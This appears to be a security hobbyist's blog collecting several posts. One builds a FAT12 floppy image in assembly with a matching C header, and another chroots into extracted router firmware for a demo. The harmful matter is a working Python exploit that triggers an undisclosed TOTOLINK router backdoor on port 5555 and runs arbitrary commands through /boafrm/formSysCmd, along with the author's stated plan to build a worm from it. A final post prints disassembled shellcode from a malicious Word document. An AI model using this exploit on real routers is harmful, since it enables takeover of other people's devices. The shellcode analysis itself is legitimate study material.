Better visualization of data formats using assembly POC's to better implement them in C

Are you tired of staring at hex dumps, white papers and manual pages? Want to feel like you truly know how a data type like a file format, or a disk partition LOOKS like. Well I can't help you with the manual pages and white papers, (https://staff.washington.edu/dittrich/misc/fatgen103.pdf, http://www.eit.lth.se/fileadmin/eit/courses/eitn50/Projekt1/FAT12Description.pdf) but here is a great example of implementing a fat12 floppy image in assembly.

;////////////////////////////////////////////////////////////////////////////////
;// THE SCOTCH-WARE LICENSE (Revision 0):
;// <aaronryool@gmail.com> wrote this file. As long as you retain this notice you
;// can do whatever you want with this stuff. If we meet some day, and you think
;// this stuff is worth it, you can buy me a shot of scotch in return
;////////////////////////////////////////////////////////////////////////////////
; This assembles to a floppy disk image
[bits 16]
[org 0x7C00]

;;;;;;;;;;;;;;;;;;;;;;;;
; BIOS Parameter Block
jmp short boot_code
nop
db "MadOSv01"          ; OEM identifier
dw 512                 ; Bytes per sector
db 1                   ; sectors per cluster
dw 1                   ; reserved sectors
db 1                   ; number of fats
dw 112                 ; directory entries
dw 1280                ; logical sectors
db 0xFB                ; media descriptor type
dw 1                   ; sectors per fat, fat12/fat16 only
dw 18                  ; sectors per track
dw 2                   ; number of heads / sides on media
dd 0                   ; number of hidden sectors
dd 0                   ; Large amount of sector on media. This field is set if there are more than 65535 sectors in the volume.

; Extended Boot Record
db 0                   ; drive number
db 0                   ; reserved / NT flags (maybe use for MadOS, More research needed)
db 0x29                ; signiture, 0x28 or 0x29 for fat12 /fat16
dd 0x1337              ; volume serial number
db "MadOS Disk "       ; volume label
db "FAT12   "          ; identifier string

; Boot code
boot_code:
    xor ax, ax
    mov ds, ax
    mov es, ax
    mov ss, ax
    mov sp, boot_code_end + (1024 * 4)

    lea si, [message]
    call print_string
    jmp $

print_string:
    lodsb
    or al, al
    jz done
    mov ah, 0x0E
    int 0x10
    jmp print_string
done:
   ret

message:
    db "MadOS disk not bootable...", 0xd, 0xa

;dw 0xAA55 ; bootable partition signiture, uncomment to make the floppy boot
boot_code_end:
times 450 - (boot_code_end - boot_code) db 0

;;;;;;;;;;;;;;;;;;;;;
; DATA AREA START

;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
; FAT entries
; an entry is 3 nibbles:
;   000         -> unused
;   0xFF0-0xFF6 -> reserved cluster
;   0xFF7       -> bad cluster
;   0xFF8-0xFFF -> last cluster in file
;   ***         -> next data cluster

fat1:
    db 0xFB, 0xFF, 0xF0, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0x07, 0xF0, 0xFF, 0x00, 0x00
    ;    0     1     2     3     4     5     6     7     8     9     10    11    12    13
    times 512 - ($ - fat1) db 0
fat2:
    times 512 - ($ - fat2) db 0
;;;;;;;;;;;;;;;;;;
; root directory
root:
    folder:
        db "folder     "
        db 0x20 | 0x10         ; attributes: a, d
        dw 0                   ; reserved
        dw 0xA496              ; creation time (h,m,s)
        dw 0x4793              ; creation date
        dw 0x4793              ; access date
        dw 0                   ; high order bits of first cluster address, 0 on fat12
        dw 0xA496              ; write time (h,m,s)
        dw 0x4793              ; write date
        dw 3                   ; low order bits of first cluster address
        dd 64                  ; file size

    file:
        db "file       "
        db 0x20                ; attributes: a
        dw 0                   ; reserved
        dw 0xA496              ; creation time (h,m,s)
        dw 0x4793              ; creation date
        dw 0x4793              ; access date
        dw 0                   ; high order bits of first cluster address, 0 on fat12
        dw 0xA496              ; write time (h,m,s)
        dw 0x4793              ; write date
        dw 2                   ; low order bits of first cluster address
        dd 40                  ; file size

; padd out the rest of the root directory
times (512 * 4) - ($ - root) db 0


times 1024 db 0     ; first two data blocks are reserved

; 2 file
file_data:
    db "This is a file in the root directory :D", 0xa
; cluster padding
times 512 - ($ - file_data) db 0

; 3 folder
folder_data:
    file2:
        db "file2      "
        db 0x20                ; attributes: a
        dw 0                   ; reserved
        dw 0xA496              ; creation time (h,m,s)
        dw 0x4793              ; creation date
        dw 0x4793              ; access date
        dw 0                   ; high order bits of first cluster address, 0 on fat12
        dw 0xA496              ; write time (h,m,s)
        dw 0x4793              ; write date
        dw 4                   ; low order bits of first cluster address
        dd 34                  ; file size
    folder2:
        db "folder2    "
        db 0x20 | 0x10         ; attributes: a, d
        dw 0                   ; reserved
        dw 0xA496              ; creation time (h,m,s)
        dw 0x4793              ; creation date
        dw 0x4793              ; access date
        dw 0                   ; high order bits of first cluster address, 0 on fat12
        dw 0xA496              ; write time (h,m,s)
        dw 0x4793              ; write date
        dw 5                   ; low order bits of first cluster address
        dd 32                  ; file size
; cluster padding
times 512 - ($ - file2) db 0

; 4 file2
file2_data:
    db "This is a file in a sub directory", 0xa
; cluster padding
times 512 - ($ - file2_data) db 0


; 5 folder2_data
folder2_data:
    file3:
        db "file3      "
        db 0x20                ; attributes: a
        dw 0                   ; reserved
        dw 0xA496              ; creation time (h,m,s)
        dw 0x4793              ; creation date
        dw 0x4793              ; access date
        dw 0                   ; high order bits of first cluster address, 0 on fat12
        dw 0xA496              ; write time (h,m,s)
        dw 0x4793              ; write date
        dw 6                   ; low order bits of first cluster address
        dd 1024                ; file size
; cluster padding
times 512 - ($ - folder2_data) db 0

; 6 file3_data
file3_data:
times 512 - ($ - file3_data) db 'A'

; 7 file3_data2
file3_data2:
times 512 - ($ - file3_data2) db 'B'




;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
; padd out the rest of the floppy
times ((1024 * 1024) + 461373) - ($ - $$) db 0

So from this exploration, we can construct the following header file as a start:

////////////////////////////////////////////////////////////////////////////////
// THE SCOTCH-WARE LICENSE (Revision 0):
//  wrote this file. As long as you retain this notice you
// can do whatever you want with this stuff. If we meet some day, and you think
// this stuff is worth it, you can buy me a shot of scotch in return
////////////////////////////////////////////////////////////////////////////////

#ifndef __FAT_H__
#define __FAT_H__

#include <stdint.h>
#include <machine.h>

typedef struct bpb {
    char jmp_code[3];
    char oem[8];
    uint16_t bytes_per_sector;
    uint8_t sectors_per_cluster;
    uint16_t reserved_sectors;
    uint8_t fats;
    uint16_t dir_entries;
    uint16_t logical_sectors;
    uint8_t media_type;
    uint16_t sectors_per_fat;
    uint16_t sectors_per_track;
    uint16_t heads;
    uint32_t hidden_sectors;
    uint32_t large_sectors;
} bpb_t;

typedef struct ebr {
    uint8_t drive;
    uint8_t rflags;
    uint8_t signiture;
    uint32_t serial;
    char label[11];
    char identifier[8];
    char boot_code[448];
    uint16_t boot_sign;
} ebr_t;

typedef struct fat12_partition_info {
// see fat12.s for an implementation
// in assembly for visualization :D

    bpb_t bpb;
    ebr_t ebr;
    char data[];
} fat12_partition_info_t;

typedef struct fat_dir_entry {
    char name[11];
    uint8_t attributes;
    uint16_t reserved;
    uint16_t creation_time;
    uint16_t creation_date;
    uint16_t access_date;
    uint16_t caddr_high;
    uint16_t write_time;
    uint16_t write_date;
    uint16_t caddr_low;
    uint32_t size;
} fat_dir_entry_t;

const uint8_t fat12_format_stub[122] = {
  0xEB, 0x3C, 0x90, 0x4D, 0x61, 0x64, 0x4F, 0x53, 0x76, 0x30,
  0x31, 0x00, 0x02, 0x01, 0x00, 0x00, 0x02, 0x00, 0x00, 0x00,
  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x29, 0x37,
  0x13, 0x00, 0x00, 0x4D, 0x61, 0x64, 0x4F, 0x53, 0x20, 0x44,
  0x69, 0x73, 0x6B, 0x20, 0x46, 0x41, 0x54, 0x31, 0x32, 0x20,
  0x20, 0x20, 0x31, 0xC0, 0x8E, 0xD8, 0x8E, 0xC0, 0x8E, 0xD0,
  0xBC, 0x7A, 0x8C, 0x8D, 0x36, 0x5E, 0x7C, 0xE8, 0x02, 0x00,
  0xEB, 0xFE, 0xAC, 0x08, 0xC0, 0x74, 0x06, 0xB4, 0x0E, 0xCD,
  0x10, 0xEB, 0xF5, 0xC3, 0x4D, 0x61, 0x64, 0x4F, 0x53, 0x20,
  0x64, 0x69, 0x73, 0x6B, 0x20, 0x6E, 0x6F, 0x74, 0x20, 0x62,
  0x6F, 0x6F, 0x74, 0x61, 0x62, 0x6C, 0x65, 0x2E, 0x2E, 0x2E,
  0x0D, 0x0A
};


/////////////////////////////////////////////
// FAT12 entries                           //
/////////////////////////////////////////////
// an entry is 3 nibbles:                  //
//   000         -> unused                 //
//   0xFF0-0xFF6 -> reserved cluster       //
//   0xFF7       -> bad cluster            //
//   0xFF8-0xFFF -> last cluster in file   //
//   ***         -> next data cluster      //
/////////////////////////////////////////////

typedef char fat12_t[];
#define GET_FAT12_ENTRY(n, fat)\
    (n % 2 == 0 ? fat[((3 * n) / 2)] | (fat[1 + (3 * n) / 2] & 0x0F) << 8 : \
    (fat[(3 * n) / 2] & 0xF0) >> 4 | fat[1 + (3 * n) / 2] << 4)


#endif

Flat Memory Manager example

Exploring cellular automata with conway's game of life as a foundation

simulating router firmware for live demonstration, more advanced RE, or just giggles

So I needed to put together a live demonstration for a presentation I'm doing soon on the attack surface of embedded devices, and why the industry seems to want their devices vulnerable. I have never needed to boot a firmware image in such a controlled manner before, and decided this would be something nice to share with others so they can just get this kind of thing up and running without hassle for their warped projects. So without further ado, lets get started.

Before you set this up, you will need to set up a basic virtual machine with the GNU/Linux distribution of your choice. You will also need to have already extracted the firmware image into a folder called squashfs-root unless you want to do the smart thing, and apply these instructions to your own personal setup.

First open the /etc/inittab for your firmware image. locate the line for sysinit and take note of what it has there.

::sysinit:/etc/rcS
::respawn:/sbin/getty 115200 ttyS1
::respawn:/bin/sh 
::restart:/sbin/init
::shutdown:/bin/umount -a -r

Ok, copy the squashfs-root folder to the root directory of the virtual machines disk image, then copy the following script into the root directory of the image as well after modifying it to meet the needs of your particular firmware image:

#!/bin/bash

export FIRMROOT="/squashfs-root"
export SYSINIT="/etc/rcS"

ifconfig eth0 10.0.3.10

# bind mount the important things so that this acts like a real linux system
mount --bind /tmp $FIRMROOT/tmp
mount --bind /sys $FIRMROOT/sys
mount --bind /proc $FIRMROOT/proc
mount --bind /dev $FIRMROOT/dev

# chroot into the firmware image, and launch the correct sysinit script for your firmware.
chroot $FIRMROOT /bin/sh -c $SYSINIT

And thats how its done. Here is a screenshot of the web login for this router running in VM:

And here is a screenshot of the router VM being exploited:

TOTOLINK backdoor exploitation POC

The following is a simple router exploit POC for giggles, based on the following vulnerability. It would appear this doesn't even have a CVE, nor has the manufacturer been notified. I will be notifying the manufacturer and will also be writing another worm POC based on this exploit lol.

#!/usr/bin/env python
# ------------------------------------------------------------------------------
# THE SCOTCH-WARE LICENSE (Revision 43):
# <aaronryool@gmail.com> wrote this file. As long as you retain this notice you
# can do whatever you want with this stuff. If we meet some day, and you think
# this stuff is worth it, you can buy me a shot of scotch in return
# ------------------------------------------------------------------------------
import socket, sys, urllib

if len(sys.argv) < 2:
    print("Usage: %s <ip> <command string>...\x1b[0m" % sys.argv[0])
    exit(1)

commandstr = urllib.quote_plus(" ".join(sys.argv[2:]))

def check_activate_backdoor():
    try:
        vulnerable = "hel,xasf"     # this is both the check, and the command to open the management interface to the internet
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect((sys.argv[1], 5555))
        s.send(vulnerable)
        ret = True if s.recv(len(vulnerable)) == vulnerable else False
        s.close()
    except:
        print("\x1b[031mThis just happened: \x1b[037m%s\x1b[0m" % sys.exc_info()[0])
        exit(2)
    return ret

def close_backdoor():
    try:
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect((sys.argv[1], 5555))
        s.send("oki,xasf")
        s.close()
    except:
        print("\x1b[031mThis just happened: \x1b[037m%s\x1b[0m" % sys.exc_info()[0])
        exit(2)
    return

if check_activate_backdoor():
    print("\x1b[032mThis device appears to be vulnerable\nbackdoor activated\x1b[0m")
    try:
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect((sys.argv[1], 80))
        s.send("POST /boafrm/formSysCmd HTTP/1.1\r\n\r\nsysCmd=%s&apply=Apply&msg=\r\n\r\n" % commandstr)
        
        print("\x1b[032mCommands sent\x1b[0m")
        print("\x1b[032mResponse: \n%s\x1b[0m" % s.recv(512))
        s.close()
    except:
        print("\x1b[031mThis just happened: \x1b[037m%s\x1b[0m" % sys.exc_info()[0])
        exit(2)
    close_backdoor()
    exit(0)
else:
    print("\x1b[032mThis device isn't vulnerable lol\x1b[0m")
    exit(1)

I have a new challenge for you ;) good luck

Below is a challenge, figure it out lol. Email answers to: aaronryool@gmail.com for shout outs

f0VMRki7Z4lotpbWTn/DAAIAPgABAAAAQIAECAAAAADyAAAAAAAAAAAAAAAAAAAAAAAAAEAAOAAB
AAAAAAAAAFhIg/gCfDFYWGhQgAQI67RIuUiLCEgx2cMAUUi5LRSQkJCQkJBRSLlIuiDmB9Lao1H/
1Egx0XQ4aIQAAAC6YOb/3Lhldm9MSMHgIEg1ZXRhSDQPW0g1AAA5R0jB4iCA6zxIMdAw3EiJBQAA
AABIMcBqAWoBWF9IjTQlxYAECGotWg8F67NZQVkhISEgVGhhdCB0aGluZyB5b3UgZGlkLCB0ZWxs
IG1lIGFib3V0IGl0LgoBAAAABwAAAAAAAAAAAAAAAIAECAAAAAAAgAQIAAAAACoBAAAAAAAAKgEA
AAAAAAAAEAAAAAAAAA==

Hax 4 Snacks Part 1

So a new friend of mine told me he wanted help extracting the shellcode and payloads from a doc file, I had never analyzed a doc file before so I just HAD to say yes after informing him that I hadn't done analysis of this particular attack vector before. In the end he said he would buy me a pizza if i could pull this off. It turns out, this evil thing is a copy cat of an existing piece of malware, find information here and its the evil version of that lol. so this made my analysis easier, especially since i have never analyzed office documents before in my LIFE. So far I can confirm that this uses at least some of the same exploits, and I feel safe to conject that it is just an obfuscated re-packaging of the original malware concept. This version also appears to be somewhat smaller in size as well. In part two I hope to do further analysis to find the signature of the egg, and decrypt the second stage shellcode. I will also plan on doing a more in depth closing analysis to find more information on the c&c, and maybe who the authors are for fun.

Stage 1 payload (crypter, egg hunter):

00000000  43                inc ebx
00000001  49                dec ecx
00000002  42                inc edx
00000003  46                inc esi
00000004  47                inc edi
00000005  42                inc edx
00000006  43                inc ebx
00000007  48                dec eax
00000008  4F                dec edi
00000009  48                dec eax
0000000A  4B                dec ebx
0000000B  4E                dec esi
0000000C  41                inc ecx
0000000D  43                inc ebx
0000000E  4E                dec esi
0000000F  4F                dec edi
00000010  4A                dec edx
00000011  48                dec eax
00000012  4A                dec edx
00000013  4A                dec edx
00000014  4A                dec edx
00000015  47                inc edi
00000016  4B                dec ebx
00000017  47                inc edi
00000018  47                inc edi
00000019  42                inc edx
0000001A  42                inc edx
0000001B  42                inc edx
0000001C  43                inc ebx
0000001D  43                inc ebx
0000001E  47                inc edi
0000001F  4A                dec edx
00000020  43                inc ebx
00000021  47                inc edi
00000022  4A                dec edx
00000023  48                dec eax
00000024  48                dec eax
00000025  4F                dec edi
00000026  49                dec ecx
00000027  43                inc ebx
00000028  42                inc edx
00000029  42                inc edx
0000002A  47                inc edi
0000002B  4E                dec esi
0000002C  48                dec eax
0000002D  42                inc edx
0000002E  D9EE              fldz
00000030  6681EF4BA9        sub di,0xa94b
00000035  6681CF72CB        or di,0xcb72
0000003A  81EED99C5940      sub esi,0x40599cd9
00000040  9BD97424F4        fstenv [esp-0xc]
00000045  6681EEA84B        sub si,0x4ba8
0000004A  83E766            and edi,byte +0x66
0000004D  66BFD341          mov di,0x41d3
00000051  8B0C24            mov ecx,[esp]
00000054  6681F729BE        xor di,0xbe29
00000059  6681F669C2        xor si,0xc269
0000005E  83ECFF            sub esp,byte -0x1
00000061  4E                dec esi
00000062  83C402            add esp,byte +0x2
00000065  6601FE            add si,di
00000068  44                inc esp
00000069  81C611B15949      add esi,0x4959b111
0000006F  6681EEA84B        sub si,0x4ba8
00000074  81C1C2000000      add ecx,0xc2
0000007A  6681EE5A44        sub si,0x445a
0000007F  31C0              xor eax,eax
00000081  8D742420          lea esi,[esp+0x20]
00000085  058AFEFFFF        add eax,0xfffffe8a
0000008A  BFAEAF3A6C        mov edi,0x6c3aafae
0000008F  F7D8              neg eax
00000091  29FE              sub esi,edi
00000093  29D2              sub edx,edx
00000095  6689FF            mov di,di
00000098  30FF              xor bh,bh
0000009A  80CF5E            or bh,0x5e
0000009D  6601F7            add di,si
000000A0  81EED99C5940      sub esi,0x40599cd9
000000A6  8A19              mov bl,[ecx]
000000A8  C1E6A2            shl esi,byte 0xa2
000000AB  C1EFEA            shr edi,byte 0xea
000000AE  30FB              xor bl,bh
000000B0  47                inc edi
000000B1  F6C301            test bl,0x1
000000B4  7515              jnz 0xcb
000000B6  81EF129A95A3      sub edi,0xa3959a12
000000BC  80EBFF            sub bl,0xff
000000BF  66BF7E92          mov di,0x927e
000000C3  EB12              jmp short 0xd7
000000C5  81EE9FC8896D      sub esi,0x6d89c89f
000000CB  81EF60C7B01D      sub edi,0x1db0c760
000000D1  FECB              dec bl
000000D3  66C1E773          shl di,byte 0x73
000000D7  66C1EE26          shr si,byte 0x26
000000DB  8819              mov [ecx],bl
000000DD  6689F7            mov di,si
000000E0  83EAFF            sub edx,byte -0x1
000000E3  47                inc edi
000000E4  83C101            add ecx,byte +0x1
000000E7  BE82AC2B86        mov esi,0x862bac82
000000EC  39C2              cmp edx,eax
000000EE  75B0              jnz 0xa0
000000F0  6E                outsb
000000F1  96                xchg eax,esi
000000F2  3BD4              cmp edx,esp
000000F4  2E6F              cs outsd
000000F6  D429              aam 0x29
000000F8  53                push ebx
000000F9  D429              aam 0x29
000000FB  43                inc ebx
000000FC  D431              aam 0x31
000000FE  57                push edi
000000FF  D419              aam 0x19
00000101  7FD4              jg 0xd7
00000103  69396617472A      imul edi,[ecx],dword 0x2a471766
00000109  AD                lodsd
0000010A  D41A              aam 0x1a
0000010C  63D4              arpl sp,dx
0000010E  0B5A27            or ebx,[edx+0x27]
00000111  5E                pop esi
00000112  B5D4              mov ch,0xd4
00000114  2D7F5EB16E        sub eax,0x6eb15e7f
00000119  96                xchg eax,esi
0000011A  1E                push ds
0000011B  F25E              repne pop esi
0000011D  B7D4              mov bh,0xd4
0000011F  47                inc edi
00000120  7407              jz 0x129
00000122  5B                pop ebx
00000123  DEA4BA7F82A02A    fisub word [edx+edi*4+0x2aa0827f]
0000012A  B016              mov al,0x16
0000012C  D405              aam 0x5
0000012E  7B5E              jpo 0x18e   ; jmp to the middle of an instruction further down,MAYBE, it depends on whether it is ever taken
00000130  B439              mov ah,0x39
00000132  D453              aam 0x53
00000134  14D4              adc al,0xd4
00000136  05435EB45C        add eax,0x5cb45e43
0000013B  73D4              jnc 0x111
0000013D  0A0A              or cl,[edx]
0000013F  6E                outsb
00000140  8439              test [ecx],bh
00000142  DE94A0501C3557    ficom word [eax+0x57351c50]
00000149  0CD4              or al,0xd4
0000014B  1B7B57            sbb edi,[ebx+0x57]
0000014E  A08FDA9F2A        mov al,[0x2a9fda8f]
00000153  B2E7              mov dl,0xe7
00000155  1A1A              sbb bl,[edx]
00000157  3030              xor [eax],dh
00000159  D6                salc
0000015A  80F02A            xor al,0x2a
0000015D  B7F0              mov bh,0xf0
0000015F  2ABADE60FDFD      sub bh,[edx-0x2029f22]
00000165  8A8A2A870908      mov cl,[edx+0x809872a]
0000016B  0CD6              or al,0xd6
0000016D  A1DCB157E6        mov eax,[0xe657b1dc]
00000172  103E              adc [esi],bh
00000174  5B                pop ebx
00000175  5F                pop edi
00000176  E79A              out 0x9a,eax
00000178  C243DE            ret 0xde43


; PART 2, jmp to middle of instruction
00000000  872A              xchg ebp,[edx]
00000002  EF                out dx,eax
00000003  DC985B06086E      fcomp qword [eax+0x6e08065b]
00000009  96                xchg eax,esi
0000000A  E9A5E11C3E        jmp dword 0x3e1ce1b4

Start of Object Linking and Embedding Compound File:

TIFF heap spray:
CVE-2013-3906